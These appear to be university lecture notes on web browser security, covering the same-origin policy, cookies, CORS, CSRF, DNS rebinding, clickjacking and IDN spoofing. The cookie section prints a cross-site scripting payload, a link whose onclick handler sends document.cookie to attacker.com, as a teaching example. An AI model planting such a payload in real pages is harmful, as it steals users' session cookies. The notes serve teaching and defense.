Web security
============

This lecture: isolation between sites in a web browser.
  Overall plan is called the "same-origin policy" (SOP)
    One of the best descriptions is in "The Tangled Web" (today's reading).
  Will try to cover some over-arching principles
  Will also talk about some interesting past/present pitfalls.
  Web browsers continuously change.
    New mechanisms have come out since "The Tangled Web".
    But mostly adding onto the existing design, rather than replacing it.

How did browser security plan come about?
  Origin: Netscape browser introduced SOP when adding support for Javascript
  Incremental design/development: no single coherent design.
    Noone expected web browsers to be used in the ways they are today.
    Security issues patched as they were discovered, with extra rules/checks.
  Browser vendors competed (and to some extent still compete) on functionality.
    Adding new features (or even security mechanisms) before standards.
  Historically, W3C has largely been documenting what browsers already do,
    instead of proposing new standards that browsers will then implement.
  Browsers didn't always agree on overall plan, or the implementation details.
    Browser vendors concurrently implement similar features.
    Implementations get deployed before specifications are discussed or agreed on.
    Many quirks, see quirksmode.org.
    As a result, many inconsistent corner cases that can be exploited.
  Now, there's quite a bit of collaboration "behind the scenes".
    Developers of Chrome, Firefox, IE talk to each other a fair amount.
  Important issues get fixed slowly over time.
    Compatibility is a huge constraint, hard to break old sites.
    (Users will stop using your web browser!)
  Some of the fixes take place in the browser and Javascript libraries (jQuery, etc).
    When possible, just a compatibility layer on top of raw browser APIs.
  Some of the improvements through new headers
    E.g., Content-Security-Policy
    E.g., same-site cookies
  Many of the attacks we talk about today are more difficult to pull off
    E.g., most of lab4 attacks don't work with Chrome
  One reason why this is a complicated security story is because there's a LOT of sharing!

In this lecture, we're going to focus on the client-side of a web application.
  In particular, how to isolate content from different providers in the same browser.
  Some of these details are handled by web frameworks and libraries (Meteor, jQuery, ...)
  Anyone building moderately complex web apps must know these details anyway.
    Need to know the limits of what the framework does and doesn't do.
    May need to extend the framework.
    May need to add a library that's not in the same framework.
    May need to interact with other web sites (facebook like button, google analytics, etc).
    May need to handle links to/from your application.
    May need to handle embedding of your application by other web sites.

Threat model / assumptions.  [ Are they reasonable? ]
  Attacker controls his/her own web site, attacker.com.
    Inevitable, with some other domain name.
  Attacker's web site is loaded in your browser.
    Advertisements, links, etc.
  Attacker cannot intercept/inject packets into the network.
    Will try to solve separately with SSL.
  Browser/server doesn't have implementation bugs (e.g., buffer overflows).
    Will try to solve separately with wide variety of techniques.

A single web application contains several types of content from a bunch of different principals.
  Example:

             http://foo.com/index.html

      +--------------------------------------------+
      |  +--------------------------------------+  |
      |  |        ad.gif from ads.com           |  |
      |  +--------------------------------------+  |
      |  +-----------------+ +------------------+  |
      |  | Analytics .js   | | jQuery.js from   |  |
      |  | from google.com | | from cdn.foo.com |  |
      |  +-----------------+ +------------------+  |
      |                                            |
      |        HTML (text inputs, buttons)         |
      |                                            |
      |  +--------------------------------------+  |
      |  | Inline .js from foo.com (defines     |  |
      |  | event handlers for HTML GUI inputs)  |  |
      |  +--------------------------------------+  |
      |+------------------------------------------+|
      ||iframe: https://facebook.com/likeThis.html||
      ||                                          ||
      || +----------------------+ +--------------+||
      || | Inline .js from      | | f.jpg from https://
      || | https://facebook.com | | facebook.com |||
      || +----------------------+ +--------------+||
      ||                                          ||
      |+------------------------------------------+|
      |                                            |

  Q: Which pieces of JavaScript code can access which pieces of state?
  For example:
    Can the analytics code from google.com access state in the jQuery code from cdn.foo.com?
      Seems maybe bad since different principals wrote the code,
      but they are included in the same frame.
    Can the jQuery code from cdn.foo.com access state in the inline JavaScript code defined by foo.com?
      They're  *almost* from the same place.
    Can the analytics code or jQuery access the HTML text inputs?
      We've got to make that content interactive somehow.
    Can JavaScript in the Facebook frame touch any state in the foo.com frame?
      Does it matter that the Facebook frame is https://, but the foo.com frame is regular http://?

One complication: to have policies browser must parse correctly
  It is difficult to identify Javascript precisely
  Example:
    <script> var x = 'UNTRUSTED'; </script>
    // Single quote breaks out of JS string
    // context into JS context
    //
    // "</script>" breaks out of JS context
    // into HTML context
  The UNTRUSTED string could contain </script>, breaking out of JS context.
    May be unintuitive.
  Similar challenges for URL parsing, dealing with internationalization, quoting rules.

Document object model
  After parsing, page is represented as a tree of objects, with which JavaScript interacts
  HTML elements -> DOM nodes organized in a tree.
  DOM nodes are objects that can be manipulated by Javascript.
  Global objects (window, document, XMLHttpRequest) allow add'l operations.
  HTML elements / DOM nodes can invoke Javascript via event handlers.
  JS issues HTTP requests using XMLHttpRequest or by creating DOM nodes.
  You will learn much more about Javascript in lab 4.

Isolation challenges
  The actor in a web browser is a document loaded in a window (or iframe).
    Moral equivalent in Unix: a program running in a process.
    Most interesting is an HTML document, but can have others (e.g., PDF).
  What can a document "do"?
    Link to other pages; user might click on a link: <a href="someurl">
    Include image files, style sheet files, etc: <img src="someurl">
    Load another document in a frame: <iframe src="someurl">
    Run Javascript code in the web browser: <script>.. code ..</script>
    Include Javascript code by URL: <script src="someurl">
  A document running Javascript code can perform many more operations.
    Access parts of the document for the current page.
    Access other windows and frames, and their documents.
    Navigate existing windows, frames.
    Open new windows, frames.
    Send requests over the network.
    ...

Browsers' answer: the same-origin policy
  Aspiration: two different websites should not be able to tamper with each other's content.
  Easy to state, but tricky to implement.
    Obviously bad: If I have two different web sites open, the first site
      should not be able to overwrite the visual display of the second site,
      or reads its content (e.g., read confidential data)
    Obviously good: Developers should be able to create mash-up sites that
      combine content from mutually cooperative web sites.
        Example: A site that combines Google Map data with real estate data.
        Example: Advertistements.
        Example: Social media widgets (e.g., the Facebook "like" button).
    Not clear what the right answer should be, from first principles: If a page
      from web server X downloads a JavaScript library from a different server Y,
      what capabilities should that script have?
      (Of course, SOP does have a clear answer for this case, but it's not obvious
       that it's the best or only possible answer.)

Definition of an origin: scheme + hostname + port
  For example:
    http://foo.com/index.html      (http, foo.com, 80 [implicit])
    https://foo.com/index.html     (https, foo.com, 443 [implicit])
    http://bar.com:8181/index.html (http, bar.com, 8181)
  Schemes can be http, https, ftp, file, etc.

Basic isolation strategy of same-origin policy:
  Assign origin to actor (window/iframe) and resource (DOM elements, windows, network URLs, etc).
  Actor can access only resources that belong to its origin.
  Javascript code running in an actor gets the privileges of that actor's origin.

Main ideas in SOP:
  1) Client-side resources (e.g., cookies, DOM storage, a JavaScript namespace,
     a DOM tree, windows, a visual display area, network addresses) associated
     with an origin.
     [ An origin is the moral equivalent of a UID in the Unix world. ]
  2) Each window / iframe gets the origin of its URL.
     [ A frame is the moral equivalent of a process in Unix. ]
  3) Scripts included by a window / iframe execute with the authority (origin)
     of that window / iframe.  This is true for both inline scripts *and* ones
     that are pulled from external domains!
     [ Unix analogy: Running a binary or using a shared library that's stored
       in somebody else's home directory with your privileges. ]

Returning to our example:
  The Google analytics script and the jQuery script can access all the resources
  belonging to foo.com (e.g., they can read and write cookies, attach event
  handlers to buttons, manipulate the DOM tree, access JavaScript variables,
  etc.).

  JavaScript code in the Facebook frame has no access to resources in the
  foo.com frame, because the two frames have different origins. The two frames
  can only talk via postMessage(), a JavaScript API that allows domains to
  exchange immutable strings.

    If the two frames *were* in the same origin, they could use window.parent
    and window.frames[] to directly interact with each other's JavaScript
    state!

  JavaScript code in the Facebook frame cannot issue an XMLHttpRequest to foo.com's server

    The network is a resource with an origin!

What happens if the browser gets the wrong MIME type of an object?
  E.g., say Facebook allows users to upload photos.
  User uploads an HTML document instead of their photo.
  Of course it doesn't render properly, but what if now their friend
    opens up "http://facebook.com/john.jpg"?

  HTTP response includes a Content-Type header.
    Specifies the MIME type of the content.
    In this case, probably image/jpeg.
    Browser should render it as a JPEG image, not run it as an HTML page.

  Unexpected "feature": content sniffing.
    Sometimes web servers are misconfigured, provide wrong header values.
    Browsers tries to "helpfully" guess the document type by "sniffing the content".

  Problem:
    Browser might guess "HTML" as the type of "john.jpg" in our example.
    Victim visiting this URL runs John's HTML+JS in the facebook.com origin.
    John's HTML+JS can get the victim's cookie, etc.

  Moral: adding a well-intentioned feature may cause subtle and unexpected security bugs.

What are some of the resources that matter in a web browser?
  Browser windows.
  DOM nodes.
  HTTP cookies.
  HTTP responses.
  Network addresses (what machines can you talk to over the network).
  Pixels on the screen (in part for UI security).

Frame/window objects
  Get the origin of their frame's URLs
           -OR-
  Get the origin of the adjusted document.domain
    A frame's document.domain is the origin of the frame's URL
    A frame can set document.domain to be a suffix of the full domain. Ex:
             x.y.z.com             //Original value
             y.z.com               //Allowable new value
             z.com                 //Allowable new value
             a.y.z.com             //Disallowed
             .com                  //Disallowed
    Why allow adjustment?
      Frame from payment.example.com may want to talk to a frame from login.example.com
    Browsers distinguish between a document.domain that has been written, and
      one that has not, even if both have the same value!
    Two frames can access each other if their document.domain is the same
      AND both adjusted it or neither adjusted it.
    These rules help protect a site from being attacked by a buggy/malicious subdomain.
      E.g., x.y.z.com trying to attack y.z.com by shortening its document.domain.

DOM nodes
  Get the origin of their surrounding window/frame

Cookies
  Ubiquitous mechanism to keep state (e.g., session info) in browser.
    Typically holds user's authentication token: juicy target!
    Cookies predate SOP.
  A cookie has a domain AND a path. Ex: *.mit.edu/6.858/
    Domain can only be a (possibly full) suffix of a page's current domain.
    Path can be "/" to indicate that all paths in the domain should have access to the cookie.
  Whoever sets cookie gets to specify the domain and path.
    Can be set by the server using a header, or by JavaScript code that writes to document.cookie.
    There's also a "secure" flag to indicate HTTPS-only cookies.
  Browser keeps cookies on client-side disk (modulo cookie expiration, ephemeral cookies, etc).
  When generating an HTTP request, the browser sends all matching cookies in the request.
    Secure cookies only sent for HTTPS requests.
  Javascript code can access any cookie that match the origin under which the code is running.
    Developer must be careful that his page doesn't include attacker's javascript
    Risk: "cross-site scripting" attack
      For example: attacker puts a cookie-stealing URL in a post/comment field

      <a href="#" onclick="window.location='http://attacker.com/stole.cgi?text='+escape(document.cookie); return false;">Click here!</a>

      This URL steal the cookies from the user who clicks on this link.
      Website developers must filter out such malicious code.
      More next week and in lab 4.
    Note that the cookie's path and the origin's port are ignored!
  The protocol matters, because HTTP JavaScript cannot access HTTPS cookies
    (although HTTPS JavaScript can access both kinds of cookies).
  Cookies in general provide weak integrity protection.
    Can be set by "sibling" domains (e.g., x.foo.com can set cookie for foo.com, which is also sent to y.foo.com).
    Can be set by insecure page and sent to secure page.

Why is it important to protect cookies from arbitrary overwriting?
   If an attacker controls a cookie, the attacker can force the user to use
    an account that's controlled by an attacker!
  Example: By setting the cookie for google.com, an attacker can cause
    the user to use the attacker's Google account, recording the user's
    search queries there.

Q: Can foo.co.uk set a cookie's domain to co.uk?
  A: This is valid according to the suffix rule above, but in practice, we
     should disallow such a thing, since ".co.uk" is semantically a single,
     "atomic" domain like ".com". Mozilla maintains a public list which allows
     browsers to determine the appropriate suffix rules for top-level domains.
     [ https://publicsuffix.org ]

HTTP responses: Many exceptions and half-exceptions to same-origin policy.
  XMLHttpRequests: By default, JavaScript can only send XMLHttpRequests to its
    origin server, unless the remote server has enabled Cross-origin Resource
    Sharing (CORS). The scheme defines some new HTTP response headers:
      Access-Control-Allow-Origin specifies which origins can see HTTP response.
      Access-Control-Allow-Credentials specifies if browser should accept
        cookies in HTTP request from the foreign origin.
  Images: A frame can load an image from any origin; it can't look at the image
    pixels, but it can determine the image's size.
  CSS: Similar story to images: a frame can't directly read the content of
    external CSS files, but can infer some of its properties.
  JavaScript: A frame can load JavaScript from any origin; it can't directly
    examine the source code in a <script> tag/XMLHttpRequest reponse
    body, but all JavaScript functions have a public toString() method which
    reveals source code.
  Plugins: A frame can load an object from any origin using an already-installed plugin.
       <embed src=...> //Requires plugin-specific
                       //elaborations.
  Arbitrary requests: A frame can navigate to an arbitrary URL (either GET or POST).

Complication: interaction between the above rules for navigation, and cookies.
  When the browser generates an HTTP request, it automatically includes the relevant cookies.
  What happens if attacker creates a web page with a frame with an origin URL like:

        http://bank.com/xfer?amount=500&to=attacker

  User visits the page.
  Browser will send user's cookie to bank.com.
  Server thinks it is a valid transfer, and transfers the money.
  This attack is called a "cross-site request forgery" (CSRF).

  Solution: Server generates some random data in URLs that is difficult for the attacker to guess.

    <form action="/transfer.cgi" ...>
      <input type="hidden"
             name="csrfToken"
             value="a6dbe323..."/>

  Each time a user requests the page, the server generates HTML with new random tokens.
  When the user submits a request, the server validates the token before processing the request.
  Drawback: Server must keep state.
  Weak alternative: store this random token in the cookie (but then susceptible to cookie-setting).

Network addresses almost have an origin.
  A frame can send HTTP *and* HTTPS requests to a host+port that match its origin.
  Complication: the security of the same-origin policy depends on the integrity
    of the DNS infrastructure!
  DNS rebinding attack.
    Goal: Attacker wants to probe internal servers from a victim's computer.
    Approach:
    1) Attacker registers a domain name (e.g., attacker.com) and creates a DNS
       server to respond to the relevant queries with a short time-to-live.
    2) User visits the attacker.com website, e.g., by clicking on an advertisement.
    3) The attacker's page issues an XMLHttpRequest for http://attacker.com/something.
       The DNS record for attacker.com timed out, so browser asks attacker's DNS server again.
    4) Attacker's DNS server responds with IP address of internal device on victim's network.
    5) Request is sent to internal device, and attacker's code in victim's browser gets the response.
  Solutions
    Modify DNS resolver so that hostnames cannot switch from external (non-RFC1918)
      to internal (RFC1918) addresses.
    Ignore TTL and pin the IP address until the page is closed.
    Downside: may break load-balancers that need to switch IP address if a server fails.

What about the pixels on a screen?
  They don't have an origin!  A frame can draw anywhere within its bounding box.
  Problem: A parent frame can overlay content atop the pixels of its child frames.
    E.g., attacker creates a page which has an enticing button like "Click here for a free iPad!"
    Atop that button, the page creates a child frame that contains the Facebook "Like" button.
    The attacker places that button atop the "free iPad" button, but makes it transparent.
    So, if user clicks on the "free iPad" button, he'll actually "Like" the attackers page on Facebook.
  Solutions
    1) Frame-busting code: Include JavaScript that prevents your page from being included as a frame.
    2) Have your web server send the X-Frame-Options HTTP response header.
       This will instruct the browser not to put your content in a child frame.
    3) Content Security Policy's frame-ancestors directive.

What about frame URLs that don't have an obvious origin?
  file://foo.txt
  about:blank
  javascript:document.cookie="x"
  data:xxx

  Problem: what origin should be assigned to such URLs?
    Applications legitimately navigate to "javascript:function()" to run JS in their page.
    Same for "data:<html>...</html>"; may need access to creator's origin?
    So these URLs may need to run in the same origin as the frame..
    What if one origin's frame navigates a different origin's frame to "javascript:foo()"?

  Origin inheritance
    Origin is inherited from whoever created the URL (e.g., "javascript:", "data:").
    This prevents attacks in which a attacker.com creates a frame belonging to victim.com,
      and then navigates the victim frame to a javascript: URL.
    We don't want the JavaScript to execute in the context of victim.com!

  Many special cases, especially around file: and about: URLs.

Names can be used as an attack vector!
  IDN: internationalized domain names (non-latin letters).
  Can be difficult for users to distinguish two domain names from each other.
    The Cyrillic "C" character looks like the Latin "C" character!
    Attacker can buy a domain like "cats.com" (with a Cyrillic "C").
    Trick users who thought that they were going to "cats.com" (Latin "C").
  Another example of how new features can undermine security assumptions.
    Browser vendors thought registrars will prohibit ambiguous names.
    Registrars throught browser vendors will change browser to do something.

Styling side channels.
  Link color/styling differs based on user's browsing history.
  One site can check if user visited other sites by checking how link are styled!
  Browsers tried prohibiting reading the color of links, or simulating them as un-visited.
  But then CSS allowed more complex styling (e.g., large font for visited links).
  Now the whole page layout changes as a result of link being visited/not-visited..

Plugins often have subtly-different security policies
  Java: Sort of uses the same-origin policy, but Java code can set HTTP headers
    (bad! see "Content-Length" discussion), and in some cases, different
    hostnames with the same IP address are considered to share the same origin.
  Flash: Developers place a file called crossdomain.xml on their web
    servers. That file specifies which origins can talk to the server via Flash.

Since "The Tangled Web," there have been various modifications and additions to the aggregate web stack.
  In general, things have gotten more complicated, which is typically bad for security.
  For reference, here are some of the new features:
    http://en.wikipedia.org/wiki/Content_Security_Policy
    http://en.wikipedia.org/wiki/Strict_Transport_Security
    http://en.wikipedia.org/wiki/Cross-origin_resource_sharing
    HTML5 iframe sandbox attribute
      https://developer.mozilla.org/en-US/docs/Web/HTML/Element/iframe

SOP is simple on one hand, but complex on the other hand: many subtleties and inconsistencies.
  Q:  Why not rewrite the security model from scratch?
  A1: Backwards compatibility! There's a huge amount of preexisting web
      infrastructure that people rely on.
  A2: How do we know that a new security model would be expressive enough?
      Users typically do not accept a reduction of features in exchange for an
      increase in security.
  A3: Any security model must evolve.

What might a better design look like?  What ideas should go into an improved design?
  Be explicit everywhere: no ambiguity or guessing.
    No suffix rule?
    Don't guess MIME types.
  Clear notion of a principal that's not tied to anything else.
    Don't run foreign javascript with the complete authority of the web page?
  Clear plan for what principal is used for every operation.
    No ambient authority.
    Specify what cookie to send on HTTP request?
    Rules on interaction between user clicks and visibility of elements.
  Clear plan for what resources are protected, what the access rules are.
    Helps app developers know what they can rely on.
    No exceptions (e.g., no images and javascript from outside of origin).
  Make it easy to figure out security-relevant pieces.
    Don't require complex parser (e.g., HTML, HTTP headers) to get policy.
    No inline javascript?
  Clear mechanism for web sites to interact (postMessage).
    No need for guessing, no need for suffix rule.